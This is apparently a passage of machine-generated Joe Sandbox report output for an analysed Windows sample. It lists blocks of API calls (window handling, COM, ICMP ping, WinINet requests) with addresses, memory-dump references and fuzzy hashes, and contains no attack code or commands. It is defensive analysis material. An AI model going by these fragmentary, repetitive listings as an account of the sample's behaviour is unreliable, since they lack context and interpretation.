                                                • Opcode Fuzzy Hash: 7bddc160a4a751adbc2c45b7fb365951c65579353a4365c2c84a12f34fc72609
                                                • Instruction Fuzzy Hash: 0E51EA22904B8869EB37D7B05A107AABFF49F11340F4A459BD9C21B3C2DB649A4CC763
                                                APIs
                                                • GetDlgItem.USER32(?,00000001), ref: 003D6571
                                                • GetWindowRect.USER32(00000000,?), ref: 003D658A
                                                • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 003D65E8
                                                • GetDlgItem.USER32(?,00000002), ref: 003D65F8
                                                • GetWindowRect.USER32(00000000,?), ref: 003D660A
                                                • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 003D665E
                                                • GetDlgItem.USER32(?,000003E9), ref: 003D666C
                                                • GetWindowRect.USER32(00000000,?), ref: 003D667E
                                                • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 003D66C0
                                                • GetDlgItem.USER32(?,000003EA), ref: 003D66D3
                                                • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 003D66E9
                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 003D66F6
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Window$ItemMoveRect$Invalidate
                                                • String ID:
                                                • API String ID: 3096461208-0
                                                • Opcode ID: 6df0b8335128d7bd87aa099550c641430674f52b91692e81063f5cdd18ad8836
                                                • Instruction ID: e858d5e50b7fbff6392053f2a63153ec7412f4184101f4af1c10d6ef2f9cba34
                                                • Opcode Fuzzy Hash: 6df0b8335128d7bd87aa099550c641430674f52b91692e81063f5cdd18ad8836
                                                • Instruction Fuzzy Hash: AF510EB1E00205AFDF09CFA8DE86AAEBBB9FB48300F118139F519E7294D7719D048B54
                                                APIs
                                                  • Part of subcall function 003721E4: GetWindowLongW.USER32(?,000000EB), ref: 003721F2
                                                • GetSysColor.USER32(0000000F), ref: 00372102
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: ColorLongWindow
                                                • String ID:
                                                • API String ID: 259745315-0
                                                • Opcode ID: 7cd9daa2940eeba486a02012844ccbdce9eeaab0ae61dc4d7f20e80e18037f77
                                                • Instruction ID: e0a95eeebf4cdf8255a82b98aaf7a11014520eeeff95b1cd6b39e11a9eb390d9
                                                • Opcode Fuzzy Hash: 7cd9daa2940eeba486a02012844ccbdce9eeaab0ae61dc4d7f20e80e18037f77
                                                • Instruction Fuzzy Hash: B541D531500650AFDB325F38DC84BBB3769BB46324F568615FBA69B2E1CB358D42DB10
                                                APIs
                                                • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0040499A
                                                • CreateCompatibleDC.GDI32(00000000), ref: 004049A1
                                                • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 004049B4
                                                • SelectObject.GDI32(00000000,00000000), ref: 004049BC
                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 004049C7
                                                • DeleteDC.GDI32(00000000), ref: 004049D1
                                                • GetWindowLongW.USER32(?,000000EC), ref: 004049DB
                                                • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 004049F1
                                                • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 004049FD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                • String ID: static
                                                • API String ID: 2559357485-2160076837
                                                • Opcode ID: a3806cde7d8e43b111b9e52c64daa16f3c0e1d6cfcfb3276374752c6f860e12b
                                                • Instruction ID: 0fab4b4d1bdf81c1905f343171d4d3abe157087b7a907553d752a5dbf8b08594
                                                • Opcode Fuzzy Hash: a3806cde7d8e43b111b9e52c64daa16f3c0e1d6cfcfb3276374752c6f860e12b
                                                • Instruction Fuzzy Hash: BD316B72500219ABDF119FA4CD08FDB3B68FF49324F100226FA58B61E0CB39D815DBA8
                                                APIs
                                                • VariantInit.OLEAUT32(?), ref: 003F45B9
                                                • CoInitialize.OLE32(00000000), ref: 003F45E7
                                                • CoUninitialize.OLE32 ref: 003F45F1
                                                • _wcslen.LIBCMT ref: 003F468A
                                                • GetRunningObjectTable.OLE32(00000000,?), ref: 003F470E
                                                • SetErrorMode.KERNEL32(00000001,00000029), ref: 003F4832
                                                • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 003F486B
                                                • CoGetObject.OLE32(?,00000000,00410B64,?), ref: 003F488A
                                                • SetErrorMode.KERNEL32(00000000), ref: 003F489D
                                                • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 003F4921
                                                • VariantClear.OLEAUT32(?), ref: 003F4935
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                • String ID:
                                                • API String ID: 429561992-0
                                                • Opcode ID: 4f8f5d58c82b8afe793ad4ac722c1c9c6382165b38a79322f25b651ce81fedc0
                                                • Instruction ID: 2403ed5401a7c5d0282b48a7f7e577e0a3164e751f068ef0f17ac102e5cd64cf
                                                • Opcode Fuzzy Hash: 4f8f5d58c82b8afe793ad4ac722c1c9c6382165b38a79322f25b651ce81fedc0
                                                • Instruction Fuzzy Hash: ADC146B16083059FD701EF68C88492BB7E9FF89748F10492DFA999B220DB71ED45CB52
                                                APIs
                                                • CoInitialize.OLE32(00000000), ref: 003E844D
                                                • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 003E84E9
                                                • SHGetDesktopFolder.SHELL32(?), ref: 003E84FD
                                                • CoCreateInstance.OLE32(00410CD4,00000000,00000001,00437E8C,?), ref: 003E8549
                                                • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 003E85CE
                                                • CoTaskMemFree.OLE32(?,?), ref: 003E8626
                                                • SHBrowseForFolderW.SHELL32(?), ref: 003E86B1
                                                • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 003E86D4
                                                • CoTaskMemFree.OLE32(00000000), ref: 003E86DB
                                                • CoTaskMemFree.OLE32(00000000), ref: 003E8730
                                                • CoUninitialize.OLE32 ref: 003E8736
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                • String ID:
                                                • API String ID: 2762341140-0
                                                • Opcode ID: 1cc744ad7f1a734d16cd83e8d91f0829a25ec200b89b5d9e34678bd54087875f
                                                • Instruction ID: fbaa67dc77a93ffdcf29786d8834c8421e43f02d0597ca6a5a2f09b99449a708
                                                • Opcode Fuzzy Hash: 1cc744ad7f1a734d16cd83e8d91f0829a25ec200b89b5d9e34678bd54087875f
                                                • Instruction Fuzzy Hash: 01C13A75A00159AFCB15DFA5C884DAEBBF9FF48304B1485A8E51AAB3A1CB30ED45CB50
                                                APIs
                                                • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 003D033F
                                                • SafeArrayAllocData.OLEAUT32(?), ref: 003D0398
                                                • VariantInit.OLEAUT32(?), ref: 003D03AA
                                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 003D03CA
                                                • VariantCopy.OLEAUT32(?,?), ref: 003D041D
                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 003D0431
                                                • VariantClear.OLEAUT32(?), ref: 003D0446
                                                • SafeArrayDestroyData.OLEAUT32(?), ref: 003D0453
                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 003D045C
                                                • VariantClear.OLEAUT32(?), ref: 003D046E
                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 003D0479
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                • String ID:
                                                • API String ID: 2706829360-0
                                                • Opcode ID: 212c096db27ea19fbff05f6b7208cda3f63706a805dbc8720ca2c87219ea5157
                                                • Instruction ID: c9f628cffe0a6ab8edc26d90ff98fa7c8ee732051ee1751da4f8b8195ebe0315
                                                • Opcode Fuzzy Hash: 212c096db27ea19fbff05f6b7208cda3f63706a805dbc8720ca2c87219ea5157
                                                • Instruction Fuzzy Hash: 9A417F35E00219DFCB05DFA5D848EAEBBB9FF48754F008069E955AB361CB30A945CFA0
                                                APIs
                                                  • Part of subcall function 00372441: GetWindowLongW.USER32(00000000,000000EB), ref: 00372452
                                                • GetSystemMetrics.USER32(0000000F), ref: 0040A926
                                                • GetSystemMetrics.USER32(0000000F), ref: 0040A946
                                                • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0040AB83
                                                • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0040ABA1
                                                • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0040ABC2
                                                • ShowWindow.USER32(00000003,00000000), ref: 0040ABE1
                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0040AC06
                                                • DefDlgProcW.USER32(?,00000005,?,?), ref: 0040AC29
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                • String ID:
                                                • API String ID: 1211466189-3916222277
                                                • Opcode ID: 76efd2f9fb46aa6d625e5d253c625c1c4a82d6e7f5703f4e686939bb31b78993
                                                • Instruction ID: 3b2fafd9b2111d8325ab98f28181a774a3332563560b3de6111578bc680530c1
                                                • Opcode Fuzzy Hash: 76efd2f9fb46aa6d625e5d253c625c1c4a82d6e7f5703f4e686939bb31b78993
                                                • Instruction Fuzzy Hash: A6B19C31600319DFDF14CF68CA85BAE7BB2BF84701F09807AED45AB295D738A960CB55
                                                APIs
                                                • WSAStartup.WSOCK32(00000101,?), ref: 003F0F19
                                                • inet_addr.WSOCK32(?), ref: 003F0F79
                                                • gethostbyname.WSOCK32(?), ref: 003F0F85
                                                • IcmpCreateFile.IPHLPAPI ref: 003F0F93
                                                • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 003F1023
                                                • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 003F1042
                                                • IcmpCloseHandle.IPHLPAPI(?), ref: 003F1116
                                                • WSACleanup.WSOCK32 ref: 003F111C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                • String ID: Ping
                                                • API String ID: 1028309954-2246546115
                                                • Opcode ID: 178bc7d0cdda32f354f3cd85263e23eb8c868655dfe226f36d0ce8ec0a099015
                                                • Instruction ID: 79fda3f818c93cc4c420f6db32641576c726ddfd773852ceb019805aaa946817
                                                • Opcode Fuzzy Hash: 178bc7d0cdda32f354f3cd85263e23eb8c868655dfe226f36d0ce8ec0a099015
                                                • Instruction Fuzzy Hash: BD91C031604242DFD721DF15D884F26BBE4EF44318F1585A9F6698F6A2CB35EC85CB81
                                                APIs
                                                • GetLocalTime.KERNEL32(?), ref: 003E8BB1
                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 003E8BC1
                                                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 003E8BCD
                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 003E8C6A
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 003E8C7E
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 003E8CB0
                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 003E8CE6
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 003E8CEF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: CurrentDirectoryTime$File$Local$System
                                                • String ID: *.*
                                                • API String ID: 1464919966-438819550
                                                • Opcode ID: 4f2b07b72ecf2f548898ab9961ebf09373eec337997442ae0d65ad8e3dbd960a
                                                • Instruction ID: 4a224832ef407a5b61971ed0a1f10d99f7d30db595d5f24f47ac8f6ad0c8d7c8
                                                • Opcode Fuzzy Hash: 4f2b07b72ecf2f548898ab9961ebf09373eec337997442ae0d65ad8e3dbd960a
                                                • Instruction Fuzzy Hash: 85619DB29043559FCB21EF60C84499FB3E8FF89314F04891EF9899B291DB35E945CB52
                                                APIs
                                                • CreateMenu.USER32 ref: 004045D8
                                                • SetMenu.USER32(?,00000000), ref: 004045E7
                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0040466F
                                                • IsMenu.USER32(?), ref: 00404683
                                                • CreatePopupMenu.USER32 ref: 0040468D
                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004046BA
                                                • DrawMenuBar.USER32 ref: 004046C2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                • String ID: 0$F
                                                • API String ID: 161812096-3044882817
                                                • Opcode ID: b6041f78ac78b1cccd1121974aa99d36ff41a74d90ad4288b0f72a6f16346dc4
                                                • Instruction ID: 31c4f329a9c086f6b4f9a08e5eb9f162cd12631c24ee38280835610419a10329
                                                • Opcode Fuzzy Hash: b6041f78ac78b1cccd1121974aa99d36ff41a74d90ad4288b0f72a6f16346dc4
                                                • Instruction Fuzzy Hash: D8418BB4A01209EFDB14CFA4DD54AAA7BB5FF4A314F040429FA45A7390D739A924CF58
                                                APIs
                                                  • Part of subcall function 0037B25F: _wcslen.LIBCMT ref: 0037B269
                                                  • Part of subcall function 003D4536: GetClassNameW.USER32(?,?,000000FF), ref: 003D4559
                                                • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 003D27F4
                                                • GetDlgCtrlID.USER32 ref: 003D27FF
                                                • GetParent.USER32 ref: 003D281B
                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 003D281E
                                                • GetDlgCtrlID.USER32(?), ref: 003D2827
                                                • GetParent.USER32(?), ref: 003D283B
                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 003D283E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                • String ID: ComboBox$ListBox
                                                • API String ID: 711023334-1403004172
                                                • Opcode ID: f3dfc68ccafb5ec0ab014be8d07644eeb09f7315f7599c11495c5fcf049eba09
                                                • Instruction ID: 60f6e81e7632967f7e8e012d62e50566d4a73332a5b82343ff096bdbe96a92ff
                                                • Opcode Fuzzy Hash: f3dfc68ccafb5ec0ab014be8d07644eeb09f7315f7599c11495c5fcf049eba09
                                                • Instruction Fuzzy Hash: 7B210471D00118BBCF22EFA0DC84EEEBBB9EF15310F104566F951A72A2CB795809DB60
                                                APIs
                                                  • Part of subcall function 0037B25F: _wcslen.LIBCMT ref: 0037B269
                                                  • Part of subcall function 003D4536: GetClassNameW.USER32(?,?,000000FF), ref: 003D4559
                                                • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 003D28D3
                                                • GetDlgCtrlID.USER32 ref: 003D28DE
                                                • GetParent.USER32 ref: 003D28FA
                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 003D28FD
                                                • GetDlgCtrlID.USER32(?), ref: 003D2906
                                                • GetParent.USER32(?), ref: 003D291A
                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 003D291D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                • String ID: ComboBox$ListBox
                                                • API String ID: 711023334-1403004172
                                                • Opcode ID: 2f2bb8dc014e56ff74dc196f2d746e4e9966a88031f065e147b45b930f9dedf3
                                                • Instruction ID: 490d42a827e912c815993dfc029b2ca107475af4f8bff6c2a298e10c6314569d
                                                • Opcode Fuzzy Hash: 2f2bb8dc014e56ff74dc196f2d746e4e9966a88031f065e147b45b930f9dedf3
                                                • Instruction Fuzzy Hash: E2210471D00118BBCF22AFA0DC44EEEFBB8EF14300F004426B990A7296D7794818DB20
                                                APIs
                                                • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004043FC
                                                • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004043FF
                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404426
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00404449
                                                • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 004044C1
                                                • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 0040450B
                                                • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00404526
                                                • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00404541
                                                • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00404555
                                                • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00404572
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: MessageSend$LongWindow
                                                • String ID:
                                                • API String ID: 312131281-0
                                                • Opcode ID: faf0036b741f75d4df02ddc7cd7327cc75767349254aefaf0c5ab23f41219d3e
                                                • Instruction ID: 003c4521582a5ce5f96bfd7ff97920e9049eab14758d34bf2815a6947cb7d77c
                                                • Opcode Fuzzy Hash: faf0036b741f75d4df02ddc7cd7327cc75767349254aefaf0c5ab23f41219d3e
                                                • Instruction Fuzzy Hash: 1A617CB5A00208AFDB11DFA4CD81EEE77B8EB49314F10416AFA14A73E1C774A945DF58
                                                APIs
                                                • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 003ECBCF
                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003ECBF7
                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 003ECC27
                                                • GetLastError.KERNEL32 ref: 003ECC7F
                                                • SetEvent.KERNEL32(?), ref: 003ECC93
                                                • InternetCloseHandle.WININET(00000000), ref: 003ECC9E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                • String ID:
                                                • API String ID: 3113390036-3916222277
                                                • Opcode ID: 9bca4a4c7be8862928d53c98e3d36e9e6d7bbb91efeb54beb1b9bf73050beb06
                                                • Instruction ID: 9562585e6c6c7a5434b2759ab7deb031a406c33b7d178bdc8a2eb26845fa5af3
                                                • Opcode Fuzzy Hash: 9bca4a4c7be8862928d53c98e3d36e9e6d7bbb91efeb54beb1b9bf73050beb06
                                                • Instruction Fuzzy Hash: C931C2B1510354AFD7229F66CD88A6F7BFCEB49740B20162DF44AE7280D730D9069B61
                                                APIs
